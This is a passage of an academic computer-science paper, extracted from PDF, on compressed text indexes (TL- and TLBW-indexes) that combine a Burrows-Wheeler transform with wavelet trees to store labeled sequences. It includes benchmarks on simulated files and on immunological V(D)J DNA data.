text, a bit vector BA marking the positions in the text where the labels change, and a WT WA indexing a compressed label sequence (Fig. 2A). 0 1 2 3 4 5 6 A A C A G C $ 7 8 9 10 11 12 13 A T C A A C $ 14 15 16 17 18 19 20 A G C T T T $ L1.2 L2 L3 L1.1 L2 Figure 1 The text T = AACAGC$ATCAAC$AGCTTT$, with three sequences, is labeled with the label string A = L1.2 L1.2 L1.2 L2 L2 L2 3 L3 L3 L3 L1.1 L1.1 L1.1 3 L2 L2 L2 3 3 3 3. Full-size DOI: 10.7717/peerj-cs.148/fig-1 Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 2/14 http://dx.doi.org/10.7717/peerj-cs.148/fig-1 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ BWT U. Let U = u0 u1 : : : un - 1 be the BWTof T = t0 t1 : : : tn - 1. As usually done, the FM-index samples every log 1+3 n values of a suffix array to retrieve the text positions of any occurrence (Navarro & Mäkinen, 2007). A′ L1.2 L2 e L3 L1.1 e L2 e WA q0 1 1 0 1 1 0 1 0 1 6 e 00100q1 0101 L3q2 10 L2q3 L1.1 L1.2 U C C T C $ A A C $ $ G A T A G A A T A T C T A A C A G C $ A T C A A C $ A G C T T T $ A L1.2 L1.2 L1.2 L2 L2 L2 ε L3 L3 L3 L1.1 L1.1 L1.1 e L2 L2 L2 e e e e BA 1 0 0 1 0 0 1 1 0 0 1 0 0 1 1 0 0 1 0 0 0 3 4 5 14 15 16 A D′ L2 L1.1 e L3 e L1.1 L1.2 e L2 L1.1 L3 L1.2 L2 e L3 e L2 WD q0 1 1 0 1 0 1 1 0 1 1 1 1 1 0 1 0 1 6 11 ε 001000010010q1 100010011 L3q2 00101 L2q3 L1.1 L1.2 U D BD C L2 1 C L1.1 1 T e 1 C L3 1 $ e 1 A L1.1 1 A L1.2 1 C L1.2 0 $ e 1 $ e 0 G L2 1 A L1.1 1 T L3 1 A L1.2 1 G L2 1 A L2 0 A L2 0 T e 1 A L3 1 T e 1 C L2 1 0 20 6 7 13 B Figure 2 TL- and TLBW-indexes store a text of length 21 with four unique labels. (A) TL-index. The WT WA has four internal nodes and five leaves. We have BA[4] = 0 because a4 = a3 = L2, and BA[3] = 1 because a3 s a2. The label a3 = L2 is thus stored in A′, at position 1, hence W〈1〉= a′1 = L2. A′ has two occurrences of the label L2: W -1 〈L2〉= {1, 6}, corresponding to the six positions {3, 4, 5, 14, 15, 16} in A. (B) TLBW-index. The root of the WT D′ is now built in the order of the BWT U. The WT WD has four internal nodes and five leaves. The label d6 = L1.2 is stored in D′, at position 6, hence W〈6〉= d′6 = L1.2. D′ has two occurrences of the label L1.2: W -1 〈L1.2〉= {6, 11}, corresponding to the three positions {6, 7, 13} in U. In both cases, the label sequences (A, D) and the compressed label sequences (A′, D′) are not stored in the indexes. Full-size DOI: 10.7717/peerj-cs.148/fig-2 Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 3/14 http://dx.doi.org/10.7717/peerj-cs.148/fig-2 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ Bit vector BA. Let BA a compressed bit vector of length n such that BA[0] = 1, and, for i � 1, BA[i] = 0 if ai = ai - 1, and otherwise BA[i] = 1. Wavelet Tree WA. Let A′ =〈ai j BA[i] = 1〉. A′ = a′0 a′1 : : : a′ a - 1 is called the compressed label sequence. It is a subsequence of A, of length a, containing only the changing labels according to the positions in A. The compressed label sequence A′ is stored using a WT WA. WA is defined as (Q, q0), where Q is the set of nodes of WA and q0 ∈ Q is the root node. Each node q ∈ Q is q = (q.val, q.label, q.left, q.right, q.parent), where q.label ∈ L ∪ {3} is the label of q and q.parent is the parent node of q (q0.parent being the null value ⊥). Both q.left and q.right are child nodes in Q ∪ {⊥}. A leaf is a node q where q.right and q.left are ⊥. Each leaf q is linked to a label q.label ∈ L ∪ {3}. The l + 1 leaves are exactly the labels of L ∪ {3} and we define leaf (q.label) = q. On a leaf q, we have q.val = ⊥. Let q be a non-leaf node: we have q.label = q.val is the bit vector rooted at q in the WT. We explain in “Shaping the WT for a Label Hierarchy” how WA can be further shaped depending on a label hierarchy. WA is part of the index. This WT is used to answer efficiently bidimensional range queries where the labels and the label positions are the two dimensions (Mäkinen & Navarro, 2007). A balanced WT has a height of log l, with l, the number of leaves. The accessor W〈i〉returns a′i, in O(log l) time. This is a classical query within a WT. Given a label Lx ∈ L, the function selectW〈Lx, i〉gives the position of the ith Lx label in A′ in O(log l) time. The accessor W -1 〈Lx〉gives the list of positions in A′ where a′i = Lx. It runs in O(log l � occ) time, with occ the number of occurrences of Lx in A′. TLBW-index: indexing labels in the order of the BWT The BWT tends to store text repetitions consecutively. As those repetitions may have the same labels, it would be interesting that the labels benefit from the BWT reordering. Hence, labels can also be stored in the order of U. Given a labeled text (T, A), the TLBW-index is defined as (U, BD, WD) (Fig. 2B). The BWT U is built in the same way as the TL-index. Let D = d0 d1 : : : dn - 1 the labels in the order of U. The bit vector BD of size n is such that BD[0] = 1, and, for i � 1, BD[i] = 0 if di = di - 1, and otherwise BD[i] = 1. Let D′ =〈di j BD[i] = 1〉. D′ = d′0, d′1 : : : d′d - 1 is a compressed label sequence of length d, subsequence of D. The WT WD now indexes the compressed label sequence D′. The TLBW-index will be slower to build than the TL-index as it needs D. On the other side, as it is aware of the order of letters in the BWT, it will be able to support faster text/label queries. Queries The indexes allow the following classical queries. � label(ti) (also called access(ai))—Which label is on the letter ti? This query is done is O(log l) time in the TL-index, and in O(log 1+3 n + log l) time in the TLBW-index since it has to convert positions in U order (see Fig. 3). � findP(P) P—Which are the occurrences of a pattern P ? It is solved with the FM-index alone (Ferragina & Manzini, 2000). This query runs in O(jPj + occ � log1+3 n) time in both indexes, where occ is the number of occurrences of P in T. Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 4/14 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ � findL(Lx)—Which text positions are labeled Lx? The query runs in O(y � log l) time in the TL-index, and in O(y(log l + log 1+3 n)) time in the TLBW-index, where Y = W -1 〈Lx〉and y = jYj. See Fig. 4. The three previous queries are well known in text indexes. The two next queries search for a pattern and a label at the same time. � countPL(P, Lx)—How many text positions are labeled Lx and begin an occurrence of a pattern P ? As in the findL(Lx) query, the occurrences of P are found in U, in the positions from i to j. TL-index: We translate all these occ occurrences to have the corresponding positions in the text. For each of them, we run the query label(ti). The total time is O(jPj + occ (log n 1+3 + log l)). TLBW-index: See Algorithm 1. i and j correspond to the positions i′ = rank(1, i, BD) and j′ = rank(1, j, BD) in the root q0 of WD. We then use an accessor customized from the rangeLocate function of (Mäkinen & Navarro, 2007), simulating a two-dimensional range query on [Lx, Lx] � [i′, j′] in WD to give the set of positions Z = {z j a′z = Lx and i′ � z � j′ } in O(jZj � log l) time. This accessor first traverses the WT from the root to the leaf Lx and then traverses it back to the root to find the positions in q0.val which match the label in the given range. For every position found, we find the corresponding positions in BD and expand them to the following 0-bits in BD. This query runs in O(jPj + jZj � log l) time. � findPL(P, Lx)—Which text positions are labeled Lx and begin an occurrence of a pattern P? TL-index: This query is exactly the same as countPL(P, Lx). WD 11010110111110101q0 e 001000010010q1 100010011 L3q2 00101 L2q3 L1.1 L1.2 U BD C 1 C 1 T 1 C 1 $ 1 A 1 A 1 C 0 $ 1 $ 0 G 1 A 1 T 1 A 1 G 1 A 0 A 0 T 1 A 1 T 1 C 1 0 6 7 20 6 Figure 3 Finding the label of a letter in a TLBW-index. The letter u7 corresponds to a 0-bit in BD. The previous 1-bit in BD is the bit at position 6. It’s the 7th 1-bit of BD, it corresponds to the bit at position 6 in WD’s root, which label is W〈6〉= L1.2. Full-size DOI: 10.7717/peerj-cs.148/fig-3 Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 5/14 http://dx.doi.org/10.7717/peerj-cs.148/fig-3 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ TLBW-index: We use the countPL(P, Lx) query detailed in Algorithm 1, replacing the counter cnt with a list Y holding the matching positions in U. The positions are converted at the end in the text order. This query runs in O(jPj + jZj � log l + y � log 1+3 n) time, with jYj = y. Algorithm 1 countPL(P, Lx): Count the positions starting a pattern P and labeled with Lx (i,j) from findP(P) ▹ starting and ending positions of occurrences of P in U i′ = rank(1, i, BD) j′ = rank(1, j, BD) C = path(Lx) ▹ bit vector representing the path from the root to leaf(Lx) node = q0 for p in 0 to jCj - 2 do ▹ loop corresponding to rangeLocate in (Mäkinen & Navarro, 2007) i′ = rank(C[p], i′ - 1, node.val) j′ = rank(C[p], j′, node.val) - 1 node = (C[p] == 0)? node.left : node.right if i′ > j ′ then return 0 cnt = 0 for k in i′ to j′ do k′ = selectW〈Lx, rank(C[jCj - 1], k, node.val)〉 ▹ ith Lx label in A′ i″ = select(1, k′, BD) j″ = select(1, k′ + 1, BD) cnt = cnt + j″ - i″ ▹ positions [i″, j″ - 1] in U taken into account return cnt WD 11010110111110101q0 e 001000010010q1 100010011 L3q2 00101 L2q3 L1.1 L1.2 U BD C 1 C 1 T 1 C 1 $ 1 A 1 A 1 C 0 $ 1 $ 0 G 1 A 1 T 1 A 1 G 1 A 0 A 0 T 1 A 1 T 1 C 1 0 6 7 20 13 6 11 Figure 4 Finding the letters which have a L1.2 label in a TLBW-index. Y = W -1 〈L1.2〉= {6, 11}. For every bit of Y, we access to the 1-bit corresponding in BD ({6, 13}), and all the 0-bits which follow it ({7}). The corresponding letters of U are labeled L1.3, at positions {6, 7, 13}. Full-size DOI: 10.7717/peerj-cs.148/fig-4 Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 6/14 http://dx.doi.org/10.7717/peerj-cs.148/fig-4 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ As jZj � y � occ, the countPL() and the findPL() queries may thus be faster on the TLBW-index, jZj depending of the compression BD can do on Y. Note that the countPL(P, Lx) query could be faster if the WT was directly built on the labels, without the intermediate bit vector BD (BA): the answer would be known while reaching the leaf of the WT in O(jPj + log l) time. We chose to favor the execution time of the findPL(P, Lx) query, as well as the size of the structure (when A can be compressed). The findPL(P, Lx) can vary to find the patterns P which have the label Lx on the ith position of the pattern, or in any pattern’s position. Adapting this queries is easy in the TL-index as we find the positions of the pattern in the BWT, translate them in the text order and then find the label of the ith position following each of them. In the TLBW-index, we find the patterns’ positions in the BWT, access to the ith letter (we need to sample the BWT to read the patterns in the forward way), and find the label as usual. To have the label in any pattern’s position, in the TL-index we need to find a label Lx between the first and last letter of the pattern (with only two access in the WT) but in the TLBW-index, we look for the label of all the pattern’s letters. Construction and space We recall that the text (T, A) is of length n and is labeled with l unique labels. As defined above, the indexes store U in nHk(T) + o(n) bits. The TL-index stores the bit vector with rank and select capabilities in nH0(BA) + o(n) bits. The size of WA depends on the compressed label sequence A′, of length a. WA takes a H0(A′) + o(a log l) bits. Similarly, the TLBW-index stores BD in nH0(BD) + o(n) bits and WD takes d H0(D′) + o(d log l) bits, where d is the length of D′. The BWT can be built in linear time while using little space (Belazzougui et al., 2016; Munro, Navarro & Nekrich, 2017). BA is built while reading A in O(n) time. To make BD, we need to read the labels in the order of the original data file in O(n) time. To make WA, we find the occurrence of each label, corresponding to a 1-bit in BA, in O(a) time. Then we form the shape of WA in O(l). The labels corresponding to a 1-bit are extracted to make the WT’s root q0. For each node containing at least two labels, we separate them by following the shape previously calculated, in O a log l= ffiffiffiffiffiffiffiffiffiffi log a p� �� . We build WD the same way. The TL-index has thus a size of nHk(T) + nH0(BA) + a H0(A′) + o(n log l) bits, assuming s = O(l), and is built in O n þ l þ a log l= ffiffiffiffiffiffiffiffiffiffi log a p� �� time. The TLBW-index has a size of nHk(T) + d H0(D′) + o(n log l) bits and is built in O n þ l þ d log l= ffiffiffiffiffiffiffiffiffiffi log d p� �� time. Shaping the WT for a label hierarchy Labels may be further organized into a label hierarchy, given an additional set F = {F0, : : : , Ff - 1} of label families (Fig. 5A). Both TL- and TLBW-indexes can be adapted: The WT W (either WA or WD) will be shaped according to the hierarchy, and internal nodes q of W may have non-empty q.label values belonging to F. For example, in Fig. 5B, one can set on either index q1.label = L1, where L1 is the label family gathering L1.1, L1.2 and L1.3. The findL() and findPL() queries naturally extend to label families. With the hierarchy depicted in Fig. 5, findL(L1) has to find the positions that have a label L1.1, L1.2 or L1.3. Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 7/14 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ Such a query does not need to be iterated on every label of the family L1, but rather directly starts at the corresponding internal node (q1 on Fig. 5B). Shaping W for a label hierarchy may increase the height w of the WT to O(l) in the worst case. To have a lower space consumption and a faster average query time, one can give a Huffman shape to W (Huffman, 1952). A leaf which corresponds to a frequently used label will be higher in the tree than a leaf of a rarely used label. Depending on the label hierarchy, the average height of the tree is H0(A′) in the best case while in the worst case it could be O(l). If no label hierarchy is given, the average height w will be H0(A′) (Mäkinen & Navarro, 2005). RESULTS AND DISCUSSION HT-index: a baseline index We compared the TL- and TLBW-indexes with a baseline solution called HT-index, indexing the text T with a BWT. The labels are stored in a map linking each label to the list of its (start,end) positions. We also store the labels in the text order with the compressed bit vector BA and, stored in plain form, A′. This enables the findL(Lx) query in O(y), where Y′ is the list of pairs (start,end) which represent the occurrences and y = jY′j. Note that Y (in the TL-index) and Y′ represent the same information as the labels are stored in the text order in both indexes. The label(ti) query runs in O(1) time. This solution is not space-efficient with repeated labels: it needs nHk(T) + nH0(BA) + a + l′ + o(n) bits, where a is the size of A′ and l′ the number of labeled factors. The query times are summarized in Table 1. Evaluation procedure The three indexes were implemented in C++. We used the SDSL-Lite library (Gog et al., 2014) to build the bit vectors and the WT. We used the RopeBWT2 library (Li, 2014), which builds a BWT in O(n log n) time on small DNA sequences, as it is very efficient for storing and appending sequences corresponding to our projected application (Cox et al., 2012). As RopeBWT2 does not sample the suffix array, we iterate over the text until we find a $ symbol. To have results close to the usual FM-index sampling in O(log 1+3 n) steps, we use sequences of length 50, which is similar to the sampling distance usually chosen in practice. The real files have longer sequences, thus longer sampling distances. The queries relying on the BWT will be slower and therefore cannot be compared between real and simulated files. We build the BA (or BD) bit vectors, compress them using the rrr_vector L L1 L1.1 L1.2 L1.3 L2 A L1.1 L1.3 L1.2 L2 q0 : family L q1 : family L1 B Figure 5 A label n-ary hierarchy (A) can be represented with a binary tree shaping the Wavelet Tree (B). The label family L1 has here three descendants, L1.1, L1.2 and L1.3. Full-size DOI: 10.7717/peerj-cs.148/fig-5 Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 8/14 http://dx.doi.org/10.7717/peerj-cs.148/fig-5 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ class of SDSL-Lite, and finally build WA (or WD) using a shape we added in SDSL-Lite, which depends of the label hierarchy. We evaluated the build time, the index size, as well as the run time of three of the queries detailed in “Queries”—findP(P) behaving similarly in all indexes and countPL(P, Lx) being very similar to findPL(P, Lx). The three indexes were tested on various datasets of labeled texts, each with 100 M characters (Table 2). Datasets and code are available at http://www.vidjil.org/data/#2018-peerjcs. � Simulated files with random sequences and random labels. All sequences and labels are random (d ∼ 0.8n). � Simulated files, with random sequences but fixed labels. Here a given label is associated to the same pattern, possibly with some variation, and we alter the proportion of labeled letters (5–100%), the variation in the label’s pattern (0–50%, more variations giving random labels), the number of unique labels (10–1,000), the length of the labels (5–100 letters). The dataset has 546 files, two of those files are shown in Table 2. � Genomic sequences with immunologic labels. A person’s immune system can be described with a set of labeled DNA sequences with V(D)J recombinations. The dataset, detailed below, uses 838 K labels from 355 unique labels, with d ∼ 0.26n. A dataset of DNA sequences with immunologic labels The adaptive immunity is the mechanism thanks to which our body defends itself against infections. When B and T-cells, or lymphocytes, are under maturation, their DNA undergo a recombination which allows several billions possibilities from a register of a thousand genes (Tonegawa, 1983). For example, the V(D)J recombination V4�02 4/ACGT/0 J1�12 means that the DNA sequence is composed from the V4�02 gene without the four last letters, then the ACGT sequence, then the J1�12 gene. A person’s immune system can thus be described with a set of labeled DNA sequences encoding V(D)J recombinations (Fig. 6). These sequences can be sampled by next- generation sequencing with bioinformatics analysis (Bystry et al., 2016, Duez et al., 2016). The tested DNA sequences come from patients 09, 12, 14 and 63 from a public dataset on a study on acute lymphoblastic leukemia (Salson et al., 2017). They have 100 M letters Table 1 Query time complexities for HT-index, TL-index and TLBW-index. Requests HT-index TL-index TLBW-index label(i) O(1) O(log l) O(log 1+3 n + log l) findP(P) O(jPj + occP � log1+3 n) findL(Lx) O(y) O(y � log l) O(y � (log l + log1+3 n)) countPL(P, Lx) O(jPj + occP � log1+3 n) O(jPj + occp � (log1+3 n + log l)) O(jPj + jZj � log l) findPL(P, Lx) O(jPj + jZj � log l + y � log1+3 n) Note: Note that we have jZj � y � occp. The label(i) and findL(Lx) queries are faster in the HT-index and the TL-index as the HT-index needs a sampling time. However, the countPL(P, Lx) and findPL(P, Lx) are faster in the HT-index. Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 9/14 http://www.vidjil.org/data/#2018-peerjcs http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ and 838 K labels from 355 unique labels, making a 117 MB file. Each DNA sequence has between 100 and 350 letters and two or three labels, each label having a size between 5 and 200 letters (Fig. 7). For a given label, the labeled subsequences may vary up to 15% due to amplification and sequencing errors. Results Index sizes. The Table 1 shows the results. As expected, the size of U, B (either BA or BD) and W (either WA or WD) grows linearly with the number of indexed elements (data not shown). The TL-index is the smallest index, and the TLBW-index is generally slightly larger. The compression is directly related to a and d. The file with random labels (d = 0.77n) is hard to compress, whereas the files with a low d/n ratio give a 2� to 7� compression. Figure 8 further shows how these sizes vary: As expected, the indexes are larger when there are less consecutive identical labels in T or in U, thus more 1-bits in B. Table 2 Size, build and query times of three indexes indexing labeled texts, on three simulated files and on a genomic DNA sequence file with immunologic labels. Random Fixed #1 Fixed #2 Genomic Sequence size 50 50 50 264 Lab. (t/u) 3.7 M / 1,000 4 M / 100 4 M / 10 852 K / 355 Lab. avg size 12.6 25 5 110.3 Lab. letters (%) 47 100 20 92 Variation (%) 100 5 50 ?? a = : : : /d = : : : 0.06n/0.77n 0.06n/0.16n 0.08n/0.36n 0.016n/0.26n TL TLBW HT TL TLBW HT TL TLBW HT TL TLBW HT Size (MB) 104 184 217 33 38 114 99 116 209 13 33 35 Time (s) 18 80 15 13.2 77 11 14.6 73.8 13.2 10.2 65 10.2 label(ti) (ms) 3.84 21.54 0.73 4.50 20.02 0.55 1.22 21.2 0.67 2.98 81.1 0.37 findL(L) (ms/l) 0.4 34 0.4 0.12 13.1 0.20 0.40 21.41 0.21 0.04 52.5 0.17 findPL(P, L) (s) 34.7 5.13 29.7 26.0 3.19 20.9 30.64 3.00 28.91 131.1 3.83 127.8 Notes: All files have 100 M characters, and differ by the number of total and unique labels (“Lab (t/u)”) and their size (“Lab. avg size”), by the ratio of labeled letters (“Lab. letters”), and by the variation between sequences labeled by the same label (“Variation”). Queries use patterns P with three letters. Times were averaged on 1 M launches (label()) or at least five launches (other queries). Times for findL(L) are reported per letter. Best or close-to-the-best results are in bold. A G G T C A A T A C G A T G A C T G G G G T C A G C T C A T A C G T C A G G A G G V1-03*1 V1-03*1 D2*1 J4-01*2 J2-033*1 D: 5 to 40V: 50 to 300 J: 20 to 80 Sequence: 100 to 500 Figure 6 V(D)J recombinations. The first sequence is an immunoglobulin “light chain,” that is a VJ recombination with two labels (one V gene, positions 0–9, and one J gene, positions 17–22). The second sequence is a “heavy chain,” that is a V(D)J recombination. Full-size DOI: 10.7717/peerj-cs.148/fig-6 Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 10/14 http://dx.doi.org/10.7717/peerj-cs.148/fig-6 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ Note that when there are more labeled letters, the text is more similar (as labels are placed on similar substrings), hence a decrease in the BWT size (A, C). W increases while the number of unique labels increases (D), the height of W increasing logarithmically with the number of unique labels. Build time. Most of the build time of TLBW-index is devoted to build D′. For TL-index, the building of U takes most of the total time. >TRGV2*02:1-177 TRGJ1*01:192-226 GGAAGGCCCCACAGCGTCTTCAGTACTATGACTCCTACAACTCCAAGGTTGTGTTGGAA (...) >IGHV3-11*01:1-251 IGHD6-19*01:260-279 IGHJ5*02:285-331 GGAGGTCCCTGAGACTCTCCTGTGCAGCCTCTGGATTCACCTTCAGTGACTACTACATG (...) Figure 7 Two annotated sequences from the dataset. Full-size DOI: 10.7717/peerj-cs.148/fig-7 A B DC HT-index TL-index BWT HT-index TL-index TLBW-index BWT HT-index TL-index TLBW-index BWT HT-index TL-index TLBW-index BWT TLBW-index Figure 8 Size of the indexes and size of the underlying BWT in the 546 files with fixed labels. The additional size in TL- and TLBW-indexes mostly depends from the size of the compressed label sequences A′ and D′. They grow when there are more labeled letters (A), more variation in the labels (B), or when the number of distinct labels increase (D). Note that when all the letters are labeled (A, 100%), there is a small decrease in the index size because there is no random letters between the patterns. The indexes shrink when the labels grow (C), as there are more common suffixes in the label sequences. Full-size DOI: 10.7717/peerj-cs.148/fig-8 Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 11/14 http://dx.doi.org/10.7717/peerj-cs.148/fig-7 http://dx.doi.org/10.7717/peerj-cs.148/fig-8 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ Queries. The label() query is faster on the HT-index. As expected, the TLBW-index needs more time for label() and findL(), as it needs to translate positions from the BWT back to the text. Note that locating the positions in the text takes about the same time as label(ti) in the TL-index. However, for the complex findPL(P, L) query, the TLBW-index is the fastest solution because the position translation is only done on the letters which have both the label and the pattern. For the TL-index and HT-index, the actual time of the findPL(P, L) queries is more affected by the number of pattern occurrences than the number of final occurrences (between 0 and 100 K depending on the file). On the genomic dataset, the sequences are longer: The TLBW-index suffers here even more from the missing suffix array sampling of the implementation for queries label() and findL(). However, on the findPL(P, L) query, the other indexes are penalized due to the sparsity of the sampling, bringing a more than 30� difference with TLBW-index. CONCLUSION The TL-index and TLBW-index store a labeled text and allow efficient queries. They can be constructed from files of some MB in a few seconds. Experiments confirm that the indexes stay small when the text is redundant (thus a smaller U), when each label describes a pattern with few variations (many 0-bits in B, thus a smaller W), and when few letters are labeled (thus a small W). However, the TL-index and TLBW-index are robust even to non- redundant text with almost random labels everywhere. The TLBW-index needs more memory space than the TL-index but is more efficient in combined label/pattern queries. Those structures might be used on any labeled data, such as DNA sequences, but also on natural language texts or on music sheets with some semantic annotations. Perspectives include improvement of the implementation, with label families queries or parameterizing the distance between samples in the FM-index to offer a space-time trade off. Within SDSL we could use the sd_vector bit vector instead of the rrr_vector bit vector which should improve space consumption when the bit vectors are very sparse. However, this would only minimally improve the global space consumption of the index. We plan to use one of the indexes in a clone database for hematological malignancies: It will allow comparison of V(D)J recombinations between different samples of a patient or between several patients. ACKNOWLEDGEMENTS We thank anonymous reviewers for their insightful comments on earlier versions of this article, as well as the EuroClonality-NGS consortium for insightful discussions. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Université de Lille, SIRIC ONCOLille, and Région Hauts-de- France. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 12/14 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ Grant Disclosures The following grant information was disclosed by the authors: Université de Lille, SIRIC ONCOLille, and Région Hauts-de-France. Competing Interests The authors declare that they have no competing interests. Author Contributions � Tatiana Rocher conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. � Mathieu Giraud conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper. � Mikaël Salson conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Code and data are available as Supplemental Dataset Files and from http://www.vidjil. org/data/#2018-peerjcs. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.148#supplemental-information. REFERENCES Arroyuelo D, Claude F, Maneth S, Mäkinen V, Navarro G, Nguyen K, Sirén J, Välimäki N. 2015. Fast in-memory XPath search using compressed indexes. Software: Practice and Experience 45(3):399–434 DOI 10.1002/spe.2227. Belazzougui D, Cunial F, Kärkkäinen J, Mäkinen V. 2016. Linear-time string indexing and analysis in small space. arXiv Preprint. Available at http://arxiv.org/abs/1609.06378. Burrows M, Wheeler DJ. 1994. A block-sorting lossless data compression algorithm. Digital Equipment Corporation. SRC Research Report, 124. Available at http://www.hpl.hp.com/ techreports/Compaq-DEC/SRC-RR-124.pdf. Bystry V, Reigl T, Krejci A, Demko M, Hanakova B, Grioni A, Knecht H, Schlitt M, Dreger P, Sellner L, Herrmann D, Pingeon M, Boudjoghra M, Rijntjes J, Pott C, Langerak AW, Groenen PJTA, Davi F, Brüggemann M, Darzentas N. 2016. ARResT/Interrogate: an interactive immunoprofiler for IG/TR NGS data. Bioinformatics 33(3):435–437 DOI 10.1093/bioinformatics/btw634. Cox AJ, Bauer MJ, Jakobi T, Rosone G. 2012. Large-scale compression of genomic sequence databases with the Burrows–Wheeler transform. Bioinformatics 28(11):1415–1419 DOI 10.1093/bioinformatics/bts173. Duez M, Giraud M, Herbert R, Rocher T, Salson M, Thonier F. 2016. Vidjil: a web platform for analysis of high-throughput repertoire sequencing. PLOS ONE 11(11):e0166126 DOI 10.1371/journal.pone.0166126. Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 13/14 http://dx.doi.org/10.7717/peerj-cs.148#supplemental-information http://www.vidjil.org/data/#2018-peerjcs http://www.vidjil.org/data/#2018-peerjcs http://dx.doi.org/10.7717/peerj-cs.148#supplemental-information http://dx.doi.org/10.7717/peerj-cs.148#supplemental-information http://dx.doi.org/10.1002/spe.2227 http://arxiv.org/abs/1609.06378 http://www.hpl.hp.com/techreports/Compaq-DEC/SRC-RR-124.pdf http://www.hpl.hp.com/techreports/Compaq-DEC/SRC-RR-124.pdf http://dx.doi.org/10.1093/bioinformatics/btw634 http://dx.doi.org/10.1093/bioinformatics/bts173 http://dx.doi.org/10.1371/journal.pone.0166126 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ Ferragina P, Manzini G. 2000. Opportunistic data structures with applications. In: Foundations of Computer Science (FOCS 2000). Piscataway: IEEE, 390–398. Available at https://people.unipmn. it/manzini/papers/focs00draft.pdf. Gog S, Beller T, Moffat A, Petri M. 2014. From theory to practice: plug and play with succinct data structures. In: Symposium on experimental algorithms (SEA 2014). 326–337. Grossi R, Gupta A, Vitter J. 2003. High-order entropy-compressed text indexes. In: Symposium on discrete algorithms (SODA 2003). 841–850. New York: ACM. Huffman DA. 1952. A method for the construction of minimum-redundancy codes. Proceedings of the IRE 40(9):1098–1101. Kärkkäinen J, Ukkonen E. 1996. Lempel-Ziv parsing and sublinear-size index structures for string matching. In: South American workshop on string processing (WSP 96). Li H. 2014. Fast construction of FM-index for long sequence reads. Bioinformatics 30(22):3274–3275 DOI 10.1093/bioinformatics/btu541. Mäkinen V, Navarro G. 2004. Run-length FM-index. In: Proceedings of the DIMACS workshop: the Burrows-Wheeler Transform: ten years later. 17–19. Mäkinen V, Navarro G. 2005. Succinct suffix arrays based on run-length encoding. In: Combinatorial Pattern Matching (CPM 2005). 45–56. Mäkinen V, Navarro G. 2007. Rank and select revisited and extended. Theoretical Computer Science 387(3):332–347 DOI 10.1016/j.tcs.2007.07.013. Munro JI, Navarro G, Nekrich Y. 2017. Space-efficient construction of compressed indexes in deterministic linear time. In: Symposium on discrete algorithms (SODA 2017). 408–424. Munro JI, Nekrich Y, Vitter JS. 2016. Fast construction of wavelet trees. Theoretical Computer Science 638:91–97 DOI 10.1016/j.tcs.2015.11.011. Navarro G, Mäkinen V. 2007. Compressed full-text indexes. ACM Computing Surveys (CSUR) 39(1):2 DOI 10.1145/1216370.1216372. Raman R, Raman V, Rao SS. 2002. Succinct indexable dictionaries with applications to encoding k-ary trees and multisets. In: Symposium on discrete algorithms (SODA 2012). 233–242. Salson M, Giraud M, Caillault A, Ferret Y, Duployez N, Duez M, Sebda S, Quief S, Villenet C, Figeac M, Preudhomme C, Grardel N. 2017. High-throughput sequencing in acute lymphoblastic leukemia: Follow-up of minimal residual disease and emergence of new clones. Leukemia Research 53:1–7 DOI 10.1016/j.leukres.2016.11.009. Tonegawa S. 1983. Somatic generation of antibody diversity. Nature 302(5909):575–581 DOI 10.1038/302575a0. Rocher et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.148 14/14 https://people.unipmn.it/manzini/papers/focs00draft.pdf https://people.unipmn.it/manzini/papers/focs00draft.pdf http://dx.doi.org/10.1093/bioinformatics/btu541 http://dx.doi.org/10.1016/j.tcs.2007.07.013 http://dx.doi.org/10.1016/j.tcs.2015.11.011 http://dx.doi.org/10.1145/1216370.1216372 http://dx.doi.org/10.1016/j.leukres.2016.11.009 http://dx.doi.org/10.1038/302575a0 http://dx.doi.org/10.7717/peerj-cs.148 https://peerj.com/computer-science/ Indexing labeled sequences Introduction Materials and Methods Results and Discussion Conclusion flink5 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off 